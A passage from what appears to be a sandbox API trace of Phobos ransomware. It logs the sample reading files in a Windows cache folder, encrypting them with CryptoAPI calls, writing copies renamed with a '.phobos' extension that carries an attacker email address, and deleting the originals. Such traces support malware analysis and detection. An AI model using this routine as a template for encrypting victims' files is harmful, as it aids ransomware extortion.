"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0195.617] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.617] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.618] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0195.618] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.618] ReadFile (in: hFile=0x154, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xb68, lpOverlapped=0x0) returned 1 [0195.632] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb70, dwBufLen=0xb70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb70) returned 1 [0195.632] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xb70, lpOverlapped=0x0) returned 1 [0195.633] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0195.633] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.633] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0195.633] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.633] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0195.634] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.634] CloseHandle (hObject=0x154) returned 1 [0195.634] CloseHandle (hObject=0x124) returned 1 [0195.634] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1")) returned 1 [0195.635] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.636] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1664) returned 1 [0195.636] CloseHandle (hObject=0x124) returned 1 [0195.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9")) returned 0x2024 [0195.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.637] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.637] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.954] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0195.954] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.954] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x680, lpOverlapped=0x0) returned 1 [0195.956] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x690, dwBufLen=0x690 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x690) returned 1 [0195.956] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x690, lpOverlapped=0x0) returned 1 [0195.957] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0195.957] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.957] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0195.957] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.957] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0195.957] CryptDestroyKey (hKey=0xa327e8) returned 1 [0195.957] CloseHandle (hObject=0x124) returned 1 [0195.957] CloseHandle (hObject=0x194) returned 1 [0195.957] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9")) returned 1 [0195.958] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.959] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=727) returned 1 [0195.959] CloseHandle (hObject=0x194) returned 1 [0195.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220")) returned 0x2024 [0195.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0195.960] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.960] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0195.961] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0195.961] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.961] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2d7, lpOverlapped=0x0) returned 1 [0196.162] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2e0) returned 1 [0196.162] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2e0, lpOverlapped=0x0) returned 1 [0196.164] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.164] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.164] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.164] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.164] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.164] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.164] CloseHandle (hObject=0x194) returned 1 [0196.164] CloseHandle (hObject=0x124) returned 1 [0196.164] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220")) returned 1 [0196.165] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.166] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=813) returned 1 [0196.166] CloseHandle (hObject=0x124) returned 1 [0196.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad")) returned 0x2024 [0196.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.166] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.166] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.167] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.167] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.167] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x32d, lpOverlapped=0x0) returned 1 [0196.168] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x330, dwBufLen=0x330 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x330) returned 1 [0196.168] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x330, lpOverlapped=0x0) returned 1 [0196.169] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.169] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.169] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0196.169] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.169] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0196.169] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.169] CloseHandle (hObject=0x124) returned 1 [0196.169] CloseHandle (hObject=0x194) returned 1 [0196.170] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad")) returned 1 [0196.170] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.171] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1608) returned 1 [0196.171] CloseHandle (hObject=0x194) returned 1 [0196.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21")) returned 0x2024 [0196.171] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0196.171] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.171] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.172] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0196.172] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.172] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x648, lpOverlapped=0x0) returned 1 [0196.253] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x650, dwBufLen=0x650 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x650) returned 1 [0196.253] WriteFile (in: hFile=0x124, lpBuffer=0x3070020*, 